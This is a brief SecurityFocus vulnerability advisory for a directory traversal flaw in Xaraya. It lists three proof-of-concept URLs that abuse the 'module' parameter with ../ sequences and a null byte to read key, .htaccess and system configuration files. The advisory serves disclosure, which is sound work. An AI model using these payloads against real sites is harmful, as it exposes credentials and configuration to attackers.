Xaraya Directory Traversal Vulnerability

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../.key.php
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../../.htaccess
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../config.system.php%00


 

Privacy Statement
Copyright 2010, SecurityFocus